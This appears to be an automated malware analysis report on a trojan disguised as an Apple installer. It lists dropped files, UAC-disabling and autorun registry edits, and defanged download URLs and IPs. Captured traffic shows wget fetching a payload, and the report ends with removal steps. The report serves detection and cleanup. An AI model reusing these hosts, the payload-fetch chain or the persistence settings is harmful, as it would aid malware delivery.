MD5: caa9e435539539ab5f1379cc66fc2e5c
SHA1: 7bb1bb2599a88bee965e2f81c682a0382d79650d
SHA256: 456cd7e5281b43d0d45589abdc64c49fd21c008699d2b3b4cada0418545dfce2
SSDeep: 12288:MNIQAPGsAqY9IMVYd38sJdpQHlGlY8KfTLIPThlEg1rZonoSbMfU48iPGZhzwbpy:NPGSY91VwNJcFMqTLIPThlEg1rZonoSj
Size: 684667 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualCv71EXE, MicrosoftVisualCv70, UPolyXv05_v6
Company: Dummy, Ltd.
Created at: 2009-09-25 21:57:32
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

schtasks.exe:1300
schtasks.exe:580
wget.exe:1668
%original file name%.exe:1532
Charles.exe:452

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process wget.exe:1668 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\arsiv.exe (3733282 bytes)

The process %original file name%.exe:1532 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Charles.exe (3821 bytes)

The process Charles.exe:452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\king.js (196 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
%Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\key.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\hash.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\ok.txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\update.txt (0 bytes)

Registry activity

The process schtasks.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 BC 0B 19 9E FD E8 A9 EC 81 4B 4B 27 96 80 07"

The process schtasks.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 5C 38 5F FE AC C3 D5 AC 76 BF F0 7E E1 12 3A"

The process wget.exe:1668 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 E4 22 23 D4 FC 83 45 6F 91 26 E7 99 30 AA 98"

The process %original file name%.exe:1532 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 9A 1C DB 27 4C 3D 1D 59 EB AC 1C CD 8D DC 44"

The process Charles.exe:452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Kingsoft]
"id_key" = "ceojbakbelhblkacoondeaabhglmaljj#MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC5GQXVHGmSH/54uXHqn3P3Y3puRpkdxZXzHEfJ8X4DBnfsNcDBUsuPP9h5WEjIVFMPJcBhhQDPJxt6OPqd75deFXyR6DPtEeCpVkbj6cIH902ufevt JLDT/DwkmfJL9AYu57br gEWKFVqBhHqu6woVtgGcVDoy4ngJZ7OzZwDQIDAQAB"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 19 3F F3 CA B4 8A 5B CF 74 2C EF C0 49 BA 5B"

[HKLM\SOFTWARE\Policies\Google\Update]
"UpdateDefault" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Google Charles" = "%Documents and Settings%\%current user%\Application Data\Charles.exe"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Apple Inc.
Product Name:
Product Version:
Legal Copyright: Apple Inc.
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 9.1.2
File Description: Apple Inc. 9.1.2 Installation
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://146.185.189.62/ahk/req.php?type=arsiv_hash
hxxp://146.185.189.62/ahk/req.php?type=arsiv_link
hxxp://178.62.177.241/app.exe
hxxp://www.filmverme.com:80/ahk/req.php?type=arsiv_link
hxxp://www.filmverme.com/ahk/req.php?type=arsiv_hash
hxxp://178.62.177.241:80/app.exe

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /app.exe HTTP/1.0

User-Agent: Wget/1.5.3.1

Host: 178.62.177.241:80

Accept: */*

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Mar 2015 19:14:07 GMT

Content-Type: application/octet-stream

Content-Length: 31990778

Last-Modified: Fri, 13 Mar 2015 01:44:12 GMT

Connection: close

ETag: "550240ec-1e823fa"

Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$..........f..{5..{5
..{5...5..{5..z5(.{5...5..{5...5..{5...5..{5...5..{5...5..{5...5..{5Ri
ch..{5........PE..L...Yj>O.....................d...............0...
.@..................................................................K.
.3...L<[email protected]....................
...........................0...............................text...2...
........................ ..`.rdata..5....0......."..............@[email protected]
ata....V...P.......@[email protected]..........
....@[email protected][email protected]..............@..@......................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................@s... s...........
.............................D$..L$....L$.u..D$......S.....D$..d$....D
$.....[...............WVS3..D$...}.G.T$.........D$..T$..D$...}.G.T$...
......D$..T$...u..L$..D$.3......D$......A...L$..T$..D$...........u....
..d$....D$.....r.;T$.w.r.;D$.v.N3...Ou........[^_.........WVU3.3..D$..
.}.GE.T$.........D$..T$..D$...}.G.T$.........D$..T$...u(.L$..D$.3.....
.D$........d$......d$....G...L$..T$..D$...........u......d$....D$.....
r.;T$.w.r.;D$.v.N D$..T$.3. D$..T$.My..................Ou........]
<<< skipped >>>

GET /ahk/req.php?type=arsiv_link HTTP/1.0

User-Agent: Wget/1.5.3.1

Host: VVV.filmverme.com:80

Accept: */*

HTTP/1.1 302 Moved Temporarily

Server: nginx

Date: Sat, 14 Mar 2015 19:14:06 GMT

Content-Type: text/html

Connection: close

X-Powered-By: PHP/5.4.17

Location: hXXp://178.62.177.241/app.exe

GET /ahk/req.php?type=arsiv_hash HTTP/1.1

User-Agent: AutoHotkey

Host: VVV.filmverme.com

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 14 Mar 2015 19:14:05 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.17
20..0c4950e06182df940d3e841551aa4378..0..

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

YYu.Pj

!"#$%%&'())* ,-./0123456789:;<""=>

VSSSh

E`SSh

SSSSSSSh

urSSSh

WSSSh

zSSShX

t*SSh

t3SSSh

VWumh0%F

u.hL%F

It.It

SSSSh

tASSSh

udPS

uÊ;MP|

!!!!!!""#$%&'(((((())* ,-.CCCCCCCC//C01234445656789:;9:;CCC<=>?@AB

AutoHotkey

AppsKey

ListHotkeys

KeyHistory

DetectHiddenWindows

SetKeyDelay

Hotkey

KeyWait

GetKeyState

URLDownloadToFile

MsgBox

IfMsgBox

AHK Keybd

X X

NOTE: To disable the key history shown below, add the line "#KeyHistory 0" anywhere in the script. The same method can be used to change the size of the history buffer. For example: #KeyHistory 100 (Default is 40, Max is 500)

The oldest are listed first. VK=Virtual Key, SC=Scan Code, Elapsed=Seconds since the previous event. Types: h=Hook Hotkey, s=Suppressed (blocked), i=Ignored because it was generated by an AHK script, a=Artificial, #=Disabled via #IfWinActive/Exist.

NOTE: Only the script's own keyboard events are shown

(not the user's), because the keyboard hook isn't installed.

Modifiers (Hook's Logical) = %s

Modifiers (Hook's Physical) = %s

Prefix key is down: %s

OWarning: The keyboard and/or mouse hook could not be activated; some parts of the script will not function.

"%s" is not a valid key name. The current thread will exit.

"%s" is not allowed as a prefix key.

%u hotkeys have been received in the last %ums.

(see #MaxHotkeysPerInterval in the help file)

Max hotkeys.

The AltTab hotkey "%s" must have exactly one modifier/prefix.

The AltTab hotkey "%s" must specify which key (L or R).

Nonexistent hotkey variant (IfWin). The current thread will exit.

Nonexistent hotkey. The current thread will exit.

SCx

A%s[%u of %u]: %-1.60s%s

: -*.|&^/

HKEY_USERS

HKEY_CURRENT_USER

HKEY_CURRENT_CONFIG

HKEY_CLASSES_ROOT

HKEY_LOCAL_MACHINE

%s\%s

<>=/|^,:*&~!() -"'\;`{}

timesincepriorhotkey

timesincethishotkey

priorhotkey

thishotkey

subkey

keydelay

detecthiddenwindows

%s%s%s

if %s %s %s and %s

%s%s %s %s

MbP?u:

%sGlobal Variables (alphabetical)%s

Local Variables for %s()%s

Key History has been disabled via #KeyHistory 0.

Window: %s

Keybd hook: %s

Mouse hook: %s

Enabled Timers: %u of %u (%s)

Interrupted threads: %d%s

Paused threads: %d of %d (%d layers)

Modifiers (GetKeyState() now) = %s

AutoHotkey2

%%%s%s%s

Script lines most recently executed (oldest first). Press [F5] to refresh. The seconds elapsed between a line and the one after it is in parentheses to the right (if not 0). The bottommost line's elapsed time is the number of seconds since it executed.

Critical Error: %s

Specifically: %-1.100s%s

%s%s: %-1.500s

in #include file "%s"

Specifically: %s

%s (%d) : ==> %s

Line Text: %-1.100s%s

Error at line %u

Action: <%-0.400s%s>%s

Params: <%-0.400s%s>

Verb: <%s>

.hta"

.cmd"

.com"

.bat"

.exe"

%s %s

System verbs unsupported with RunAs. The current thread will exit.

#KeyHistory

#MaxThreadsPerHotkey

#MaxHotkeysPerInterval

#HotkeyInterval

#HotkeyModifierTimeout

#InstallKeybdHook

<>=/|^,:*&~!() -

Too many parameters passed to function.

Too few parameters passed to function.

Caller must pass a variable to this ByRef parameter.

<>/|^,*&~!. -"

Unsupported parameter default.

<>=/|^,:*&~!()"

"%s" requires that parameter #%u be non-blank.

"%s" requires at least %d parameter%s.

Invalid hotkey.

<>=/|^,:*&~!() -".

Unsupported static initializer.

Could not extract script from EXE.

Duplicate hotkey.

Hotkeys/hotstrings are not allowed inside functions.

{Blind}{%s Up}

*%s::

*%s up::

{Blind}%s%s{%s DownTemp}

if not GetKeyState("%s")

Note: The hotkey %s will not be active because it does not exist in the current keyboard layout.

<>=/|^,:

<>=/|^,:. -*&!?~

Join

>AUTOHOTKEY SCRIPT<

EndKey:

SOFTWARE\AutoHotkey

\\.\%c:

\\.\vwin32

open "%s" alias AHK_PlayMe

All Files (*.*)

Text Documents (*.txt)

*.txt

%s%c%sÊll Files (*.*)%c*.*%c

Select File - %s

1.0.48.05

\AutoHotkey.exe

WIN32_WINDOWS

.DEFAULT\Control Panel\Desktop\ResourceLocale

SOFTWARE\Microsoft\Windows\CurrentVersion

SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

Compile error %d at offset %d: %s

%sBottom

%sRight

%sTop

%sLeft

0xX

Could not open URL hXXp://VVV.autohotkey.com in default browser.

hXXp://VVV.autohotkey.com

hh.exe

%sAutoHotkey.chm"

\AutoHotkey.chm"

%sAU3_Spy.exe"

\AU3_Spy.exe"

set cd door %s wait

open %s type cdaudio alias cd wait shareable

set cdaudio door %s wait

Component Doesn't Support This Control Type

Mixer Doesn't Support This Component Type

0xX

Mb@AAutoHotkey v1.0.48.05

Len%d

Pos%d

Len%s

Pos%s

0.0.0.0

InternetOpenUrlA

Select Folder - %s

%u.%u.%u.%u

RunAs: Missing advapi32.dll. The current thread will exit.

%dGui

vkX

AutoHotkeyGUI

Password

Report

msctls_hotkey32

Button%s

&Suspend Hotkeys

Supported only for the tray menu The current thread will exit.

dddddd

dA\\?\

GdiplusShutdown

dd

The following %s name contains an illegal character:

"%-1.300s"%s

The maximum number of MsgBoxes has been reached.

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

erroffset passed as NULL

POSIX collating elements are not supported

this version of PCRE is not compiled with PCRE_UTF8 support

PCRE does not support \L, \l, \N, \U, or \u

support for \P, \p, and \X has not been compiled

(*VERB) with an argument is not supported

mscoree.dll

- This application cannot run using the active version of the Microsoft .NET Runtime

Please contact the application's support team for more information.

GetProcessWindowStation

user32.dll

internal state. The program cannot safely continue execution and must

continue execution and must now be terminated.

WSOCK32.dll

WINMM.dll

VERSION.dll

COMCTL32.dll

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardLayout

UnhookWindowsHookEx

SetWindowsHookExA

RegisterHotKey

UnregisterHotKey

SetKeyboardState

GetKeyboardState

VkKeyScanExA

MapVirtualKeyA

GetAsyncKeyState

GetKeyNameTextA

keybd_event

EnumChildWindows

EnumWindows

ExitWindowsEx

USER32.dll

GDI32.dll

comdlg32.dll

RegCloseKey

RegEnumKeyExA

RegQueryInfoKeyA

RegOpenKeyExA

RegCreateKeyExA

RegDeleteKeyA

ADVAPI32.dll

ShellExecuteExA

SHFileOperationA

SHELL32.dll

ole32.dll

OLEAUT32.dll

GetCPInfo

-()[]{}:;'"/\,.?!

zcÁ

%Documents and Settings%\%current user%\Application Data

%Documents and Settings%\%current user%\Application Data\Charles.exe

O.aMX

version="1.0.48.05"

name="Microsoft.Windows.AutoHotkey"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

&Lines most recently executed

&Hotkeys and their methods

&Key history and script info

&Web Site

Apple Inc. 9.1.2 Installation

9.1.2

arsiv.exe_1800:

.text

`.rdata

@.data

@.rsrc

^SShq

%.*s(%d)%s

COMCTL32.dll

SHLWAPI.dll

GetProcessHeap

GetCPInfo

KERNEL32.dll

USER32.dll

GDI32.dll

COMDLG32.dll

RegCloseKey

RegCreateKeyExW

RegOpenKeyExW

ADVAPI32.dll

SHFileOperationW

ShellExecuteExW

SHELL32.dll

ole32.dll

OLEAUT32.dll

WINRAR.SFX

d:\Projects\WinRAR\SFX\build\sfxrar32\Release\sfxrar.pdb

:(,4;<=>;?@

3,45657879

8888888888887

version="1.0.0.0"

<requestedExecutionLevel level="requireAdministrator"

name="Microsoft.Windows.Common-Controls"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

<!--The ID below indicates application support for Windows Vista -->

<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>

<!--The ID below indicates application support for Windows 7 -->

<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>

<asmv3:windowsSettings xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">

</asmv3:windowsSettings>

r%.*s(%d)%s

rtmp%d

<head><meta http-equiv="content-type" content="text/html; charset=

Shell.Explorer

%s %s

%s %s %s

GETPASSWORD1

%s%s%d

Software\Microsoft\Windows\CurrentVersion

%s.%d.tmp

winrarsfxmappingfile.tmp

-el -s2 "-d%s" "-p%s" "-sp%s"

__tmp_rar_sfx_access_check_%u

sfxcmd

riched20.dll

riched32.dll

Dosyalar %s klas

*%Documents and Settings%\%current user%\Application Data\arsiv.exe

%Documents and Settings%\%current user%\Application Data\arsiv.exe

Enter password

&Enter password for the encrypted file:

Extracting %s

Skipping %s

The file "%s" header is corrupt%The archive comment header is corrupt

Unknown method in %s

Cannot open %s

Cannot create %s

Cannot create folder %sDCRC failed in the encrypted file %s. Corrupt file or wrong password.

CRC failed in %s

Packed data CRC failed in %s

Wrong password for %s5Write error in the file %s. Probably the disk is full

Read error in the file %s

Extracting from %s

ErroraErrors encountered while performing the operation

Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.

Extracting files to %s folder$Extracting files to temporary folder

=Total path and file name length must not exceed %d characters#Unsupported encryption method in %s

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   schtasks.exe:1300
   schtasks.exe:580
   wget.exe:1668
   %original file name%.exe:1532
   Charles.exe:452

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Application Data\arsiv.exe (3733282 bytes)
   %Documents and Settings%\%current user%\Application Data\Charles.exe (3821 bytes)
   %Documents and Settings%\%current user%\Application Data\king.js (196 bytes)
   %Documents and Settings%\%current user%\Application Data\ok.txt (9 bytes)
   %Documents and Settings%\%current user%\Application Data\wget.exe (1333 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
   %Documents and Settings%\%current user%\Application Data\key.txt (249 bytes)
   %Documents and Settings%\%current user%\Application Data\hash.txt (32 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Google Charles" = "%Documents and Settings%\%current user%\Application Data\Charles.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.